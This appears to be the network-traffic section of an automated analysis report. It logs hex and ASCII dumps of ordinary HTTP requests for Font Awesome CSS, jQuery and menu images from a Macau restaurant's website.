                                                                                                                                                              Data Ascii: /*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul
                                                                                                                                                              Mar 13, 2023 05:26:05.843683958 CET618INData Raw: 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 2e 31 34 32 38 35 37 31 34 65 6d 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 66 61 2d 75 6c 3e 6c 69 7b 70 6f 73 69 74 69 6f 6e 3a 72
                                                                                                                                                              Data Ascii: {padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em
                                                                                                                                                              Mar 13, 2023 05:26:06.046550989 CET635INData Raw: 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 32 37 30 7b 2d 6d 73 2d 66 69 6c 74
                                                                                                                                                              Data Ascii: deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);-ms-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-hor
                                                                                                                                                              Mar 13, 2023 05:26:06.046597958 CET636INData Raw: 7d 2e 66 61 2d 74 68 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 39 22 7d 2e 66 61 2d 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 61 22 7d 2e 66 61 2d 74 68 2d 6c 69 73 74 3a 62 65 66
                                                                                                                                                              Data Ascii: }.fa-th-large:before{content:"\f009"}.fa-th:before{content:"\f00a"}.fa-th-list:before{content:"\f00b"}.fa-check:before{content:"\f00c"}.fa-remove:before,.fa-close:before,.fa-times:before{content:"\f00d"}.fa-search-plus:before{content:"\f00e"}.
                                                                                                                                                              Mar 13, 2023 05:26:06.046753883 CET638INData Raw: 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 65 22 7d 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 66 22 7d 2e 66 61 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f
                                                                                                                                                              Data Ascii: kmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-camera:before{content:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-w
                                                                                                                                                              Mar 13, 2023 05:26:06.249497890 CET655INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 31 22 7d 2e 66 61 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 32 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74
                                                                                                                                                              Data Ascii: e{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:before{content:"\f055"}.fa-minus-circle:before{content:"\f056"}.fa-times-circle:before{content:
                                                                                                                                                              Mar 13, 2023 05:26:06.249593973 CET657INData Raw: 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70
                                                                                                                                                              Data Ascii: fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:before{con
                                                                                                                                                              Mar 13, 2023 05:26:06.249715090 CET658INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63
                                                                                                                                                              Data Ascii: e{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-feed:before,.fa-rss:b
                                                                                                                                                              Mar 13, 2023 05:26:06.322791100 CET668INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72
                                                                                                                                                              Data Ascii: e{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underl
                                                                                                                                                              Mar 13, 2023 05:26:06.322849989 CET669INData Raw: 65 6d 61 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 38 22 7d 2e 66 61 2d 75 6d 62 72 65 6c 6c 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e
                                                                                                                                                              Data Ascii: emap:before{content:"\f0e8"}.fa-umbrella:before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-clou
                                                                                                                                                              Mar 13, 2023 05:26:06.452478886 CET685INData Raw: 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 62 22 7d 2e 66 61 2d 63 69 72 63 6c 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 63 22 7d 2e 66 61 2d 71 75 6f 74 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65
                                                                                                                                                              Data Ascii: e:before{content:"\f10b"}.fa-circle-o:before{content:"\f10c"}.fa-quote-left:before{content:"\f10d"}.fa-quote-right:before{content:"\f10e"}.fa-spinner:before{content:"\f110"}.fa-circle:before{content:"\f111"}.fa-mail-reply:before,.fa-reply:befo
                                                                                                                                                              Mar 13, 2023 05:26:07.611341953 CET811OUTGET /m/static/js/jquery.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:07.816533089 CET857INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 268039
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:22 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "f8af20a9a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:13 GMT
                                                                                                                                                              Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 32 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 37 2d 30 33 2d 32 30 54 31 38 3a 35 39 5a 0a 20 2a 2f 0a 28 20 66 75 6e 63 74 69 6f 6e 28 20 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 20 29 20 7b 0a 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 29 20 7b 0a 0a 09 09 2f 2f 20 46 6f 72 20 43 6f 6d 6d 6f 6e 4a 53 20 61 6e 64 20 43 6f 6d 6d 6f 6e 4a 53 2d 6c 69 6b 65 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 73 20 77 68 65 72 65 20 61 20 70 72 6f 70 65 72 20 60 77 69 6e 64 6f 77 60 0a 09 09 2f 2f 20 69 73 20 70 72 65 73 65 6e 74 2c 20 65 78 65 63 75 74 65 20 74 68 65 20 66 61 63 74 6f 72 79 20 61 6e 64 20 67 65 74 20 6a 51 75 65 72 79 2e 0a 09 09 2f 2f 20 46 6f 72 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 73 20 74 68 61 74 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 61 20 60 77 69 6e 64 6f 77 60 20 77 69 74 68 20 61 20 60 64 6f 63 75 6d 65 6e 74 60 0a 09 09 2f 2f 20 28 73 75 63 68 20 61 73 20 4e 6f 64 65 2e 6a 73 29 2c 20 65 78 70 6f 73 65 20 61 20 66 61 63 74 6f 72 79 20 61 73 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 2e 0a 09 09 2f 2f 20 54 68 69 73 20 61 63 63 65 6e 74 75 61 74 65 73 20 74 68 65 20 6e 65 65 64 20 66 6f 72 20 74 68 65 20 63 72 65 61 74 69 6f 6e 20 6f 66 20 61 20 72 65 61 6c 20 60 77 69 6e 64 6f 77 60 2e 0a 09 09 2f 2f 20 65 2e 67 2e 20 76 61 72 20 6a 51 75 65 72 79 20 3d 20 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 28 77 69 6e 64 6f 77 29 3b 0a 09 09 2f 2f 20 53 65 65 20 74 69 63 6b 65 74 20 23 31 34 35 34 39 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 2e 0a 09 09 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 67 6c 6f 62 61 6c 2e 64 6f 63 75 6d 65 6e 74 20 3f 0a 09 09 09 66 61 63 74 6f 72 79 28 20 67 6c 6f 62 61 6c 2c 20 74 72 75 65 20 29 20 3a 0a 09 09 09 66 75 6e 63 74 69 6f 6e 28 20 77 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 21 77 2e 64 6f 63 75 6d 65 6e 74 20 29 20 7b 0a 09 09 09 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 20 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 63 74 6f 72 79 28 20 77 20 29 3b 0a 09 09 09 7d 3b 0a 09 7d 20
                                                                                                                                                              Data Ascii: /*! * jQuery JavaScript Library v3.2.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2017-03-20T18:59Z */( function( global, factory ) {"use strict";if ( typeof module === "object" && typeof module.exports === "object" ) {// For CommonJS and CommonJS-like environments where a proper `window`// is present, execute the factory and get jQuery.// For environments that do not have a `window` with a `document`// (such as Node.js), expose a factory as module.exports.// This accentuates the need for the creation of a real `window`.// e.g. var jQuery = require("jquery")(window);// See ticket #14549 for more info.module.exports = global.document ?factory( global, true ) :function( w ) {if ( !w.document ) {throw new Error( "jQuery requires a window with a document" );}return factory( w );};}
                                                                                                                                                              Mar 13, 2023 05:26:08.838232994 CET1185OUTGET /images/menu03.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.043085098 CET1214INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1828
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "564f34f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 89 00 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 03 07 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 08 10 00 01 03 04 01 03 03 02 04 07 00 00 00 00 00 00 03 01 02 04 00 11 05 06 12 21 22 13 31 41 14 15 16 61 42 07 17 71 32 62 23 33 24 34 11 00 01 03 03 02 05 03 03 05 00 00 00 00 00 00 00 01 00 11 02 21 31 03 41 12 51 61 81 13 04 91 c1 32 f0 b1 d1 71 f1 22 62 14 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 de 75 f9 65 7c 04 e7 44 4e 74 44 e7 44 4e 74 45 22 4c 79 70 de 31 cc 8c 68 af 28 d8 61 30 cc 73 15 c3 23 79 31 e8 8e 44 bb 5c 8b 74 5f 45 4a 10 ca 8c 48 ba 8f ce 8a 53 9d 11 39 d1 14 89 31 e5 c3 78 c7 32 31 a2 bc a3 61 84 c3 31 cc 57 0c 8d e4 c7 a2 39 12 ed 72 2d d1 7d 15 28 43 2a 31 22 ea 3f 3a 29 4e 74 44 e7 44 5e 8b a9 9d f8 9d 2b 73 d8 f1 8f 41 67 a2 c8 c7 c2 8f 3d a9 fd e8 80 92 a4 52 10 4e fc 8e 7a b5 19 c9 3a a7 b5 af 5e 88 52 24 8b af 6e 03 b3 14 e6 3e 54 1f a3 ad 56 16 17 ee 0e 0f 50 fb a6 49 e4 4e 93 b4 3f 0e 3c cf 24 f9 a5 84 e8 be 57 b5 c5 23 5e a4 f1 bd 12 ca e4 5b 5e d5 71 8f 70 0d dc 59 6d 8e 3d f8 47 7d f7 33 ea cc b1 b8 2d 4b 1b 93 c5 62 a7 1c f2 58 69 db 7c 5d 7c ad 1b 98 8d 48 c7 1f 27 3d a8 ac 55 f2 22 fa 2d ed fd 35 9c 71 82 3a b2 c3 1e 08 ca 20 9d 64 23 d1 67 36 50 60 e1 66 65 63 b0 ad 9a c8 d8 f3 92 31 e5 4e 28 c8 f2 b8 6f 56 a9 1a c1 08 7c 13 a7 f2 aa bb f8 d4 ce 20 16 0b 1c d1 88 93 45 e9 c5 6f 7f 51 36 0c ce b9 b2 e5 75 5c 3c c2 63 b5 bc 70 05 0e 26 19 88 8b 14 a0 78 18 aa 52 09 c8 ac 2b 88 ae 57 f3 72 2a dd 6e 8b d1 2b 5c b2 31 96 d1 65 ea f2 b2 4b 1c cc 22 5a 22 8d a5 95 d6 c3 86 c0 e7 e5 c6 86 f7 4f 0e 72 26 8f 0f 24 09 6d 20 be 25 e1 e3 d8 54 0b 83 e3 57 bb 9b 1a bd fe 44 b2 fe 55 f5 aa 9c 04 8f 36 f6 5a 65 c7 0c 85 aa fb 01 e5 40 a8 f1 fa 4e ba 6c a6 b7 aa cb 36 45 73 fb 2e 30 53 85 95 09 04 90 e3 92 50 54 e0 1b a3 a8 5c f2 35 12 c8 f7 21 5b ef 64 e9 50 31 45 c4 6a e5 65 1f 1a 06 51 81 7d d2 0e fa 56 d4 6f 75 45 94 c1 eb 38 2c 7e 26 3e 41 f9 29 19 cc d6 21 99 48 f3 23 3c 2d 86 27 c8 bf 80 2e 13 c7 cd e9 db de f4 22 5b d9 ab 6a 99 42 31 01 dd c8 59 cf 14 20 00 2e e4 3e 8d cb f7 75 7b 33 4a d7 07 90 da 35 88 e6 c8 b7 3f ab 63 0f 38 d9 62 90 5f 08 e5 88 c4 21 c6 91 d0 28 f1 b5 51 55 18 e5 2b ba da e9 d6 a8 e2 8b 91 57 0b 49 78 d0 79 40 3e e8 87 7d 29 7a 37 ba b5 d9 f0 b8 b9 03 7e c7 99 59 46 81 83 d7 75 b0 37 1f 08 8c 09 8c 69 91 11 18 aa 62 0c cd 63 1a 83 55 5e c5 55 e8 89 55 38 03 53 a0 0a f3 63 89 fe 72 76 11 8d b9 8e aa 20 7f 4e b1 72 4a 79 f0 05
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedd!"1AaBq2b#3$4!1AQa2q"b?ue|DNtDDNtE"Lyp1h(a0s#y1D\t_EJHS91x21a1W9r-}(C*1"?:)NtDD^+sAg=RNz:^R$n>TVPIN?<$W#^[^qpYm=G}3-KbXi|]|H'=U"-5q: d#g6P`fec1N(oV| EoQ6u\<cp&xR+Wr*n+\1eK"Z"Or&$m %TWDU6Ze@Nl6Es.0SPT\5![dP1EjeQ}VouE8,~&>A)!H#<-'."[jB1Y .>u{3J5?c8b_!(QU+WIxy@>})z7~YFu7ibcU^UU8Scrv NrJy
                                                                                                                                                              Mar 13, 2023 05:26:09.058377981 CET1216OUTGET /images/menu04.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.263271093 CET1280INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1598
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ccff44f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 5a 03 01 11 00 02 11 01 03 11 01 ff c4 00 83 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 01 03 04 01 03 03 05 01 01 00 00 00 00 00 00 03 01 02 04 11 12 05 06 00 21 22 13 31 41 15 51 61 32 14 07 71 16 11 00 01 03 04 00 04 05 03 05 00 00 00 00 00 00 00 01 00 11 02 21 31 12 03 41 61 13 04 51 71 81 91 a1 b1 22 14 f0 e1 f1 32 82 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b7 f3 e5 95 e0 25 fc 22 5f c2 25 fc 22 5f c2 25 fc 22 5f c2 29 05 8d 2c 00 8b 28 f1 4c 18 d3 91 ee 85 21 e3 73 46 64 1b 95 8f 51 b9 52 8e 46 b9 15 16 9e 8b d3 86 56 31 20 02 45 d4 7b f8 55 4b f8 44 bf 84 4b f8 45 d2 e1 4e 95 ae 7f 35 8d 98 c0 c9 7c 0c ae 63 3a 78 79 2c b4 75 51 c9 18 40 06 3c 60 61 9b 47 31 ae 57 2b 96 d5 4a ff 00 89 4e 74 87 8c 1c 5c 95 dd 19 1d 7a 32 89 62 4b 13 c6 d6 56 39 38 80 6e 18 9d 5f 31 9c 79 19 9a 93 af 67 66 cd 98 1b 06 59 4b 8b 55 58 a5 35 5a eb ae a2 b5 ce a5 5c 89 eb cb 18 e6 01 37 63 f0 b5 3a c6 e8 c6 52 be 32 3e 6d 67 55 ed 7f 49 c3 65 07 a0 92 64 a9 82 66 d0 99 95 c9 b8 2a 35 51 a6 35 8a e1 a8 51 cc f7 a7 75 ca b5 f6 a7 29 1d 40 e3 cd fe 16 5a bb 68 cb 07 27 ee c9 fd 15 2e 29 71 8f d9 71 6b 88 8f 26 34 1f dd 8c 82 1c c3 30 e5 55 42 36 ae 57 0c 42 6a 57 e9 6f 4f aa fa f2 80 0c 83 2e 78 e3 98 c5 d9 c5 d7 60 dc f3 50 e4 4a dc 35 ac be c8 bb 24 bc 9e ce 8c c2 c1 6b 64 3d 70 e3 1c b7 a1 91 a5 94 36 35 8a ac 5f 1d a2 b9 9d 2b 5a 73 7d 85 dc 12 f5 f6 5d fd c6 c0 4c a1 29 64 4c a9 7f b6 bc fd a8 ab 79 1d 4f 50 89 93 dd 18 2f 97 7e 2f 44 bd 93 ae 38 16 44 d3 3e 4b 63 05 83 a4 7b 42 d6 b9 56 e7 b9 1f 54 a2 a3 52 b4 e5 0e b8 82 6f 45 8c f4 6b 12 9d da 3e 55 ab 78 53 e5 7a 3d 1b 5f 3c 78 bb 08 e4 64 07 ae 97 5e 93 9b 3e 35 c4 12 ce 42 45 92 91 1c 06 9b c4 d6 5a a4 72 2a 11 47 f8 d7 b7 8e 90 bf 06 74 1d b4 08 12 ae 38 92 dc 68 59 bf 76 56 02 e1 30 5b 2e 2f f9 c4 08 cb 3e 2e 25 30 7b 04 c0 34 84 13 a4 34 91 8c 73 58 e2 20 d1 8e 6f 91 aa 95 46 22 ab 7d 9a bc be 02 42 23 83 15 a9 d7 0d 91 d6 03 b3 48 fb 3a aa 6b fa 36 33 2f 8a d6 b2 52 26 4a 03 67 bb 32 6c ba 0e c7 2f eb e2 82 33 23 63 b5 5b 5b de 8e 54 ee 55 4f b7 d6 91 d4 08 07 cf e1 63 ab b6 8c e3 12 49 ab bf f9 f0 52 35 56 68 92 d9 b5 10 78 5c 9c 96 46 d7 24 49 7c 79 92 a2 bd c1 78 cc 36 aa 80 c9 11 7b dc d7 36 d7 d8 db 3b 92 8f ad 51 01 0a d0 d9 4e 91 a8 e5 43 fd 4d c8 f8 a7 f0 b4 c2 d7 f0 b3 75 83 65 b1 31 e5 e5 72 42 1c a3 e4 22 0f 21 1d 8f c6 84 44 54 1b 8b 15 d1 bc b2 19 e3 a3 9c 41 ab 5a 9e e8 da 72 b8 03 17 1f 5b 2c
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedZ!"1AQa2q!1AaQq"2?%"_%"_%"_),(L!sFdQRFV1 E{UKDKEN5|c:xy,uQ@<`aG1W+JNt\z2bKV98n_1ygfYKUX5Z\7c:R2>mgUIedf*5Q5Qu)@Zh'.)qqk&40UB6WBjWoO.x`PJ5$kd=p65_+Zs}]L)dLyOP/~/D8D>Kc{BVTRoEk>UxSz=_<xd^>5BEZr*Gt8hYvV0[./>.%0{44sX oF"}B#H:k63/R&Jg2l/3#c[[TUOcIR5Vhx\F$I|yx6{6;QNCMue1rB"!DTAZr[,
                                                                                                                                                              Mar 13, 2023 05:26:09.349841118 CET1282OUTGET /images/menu06.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
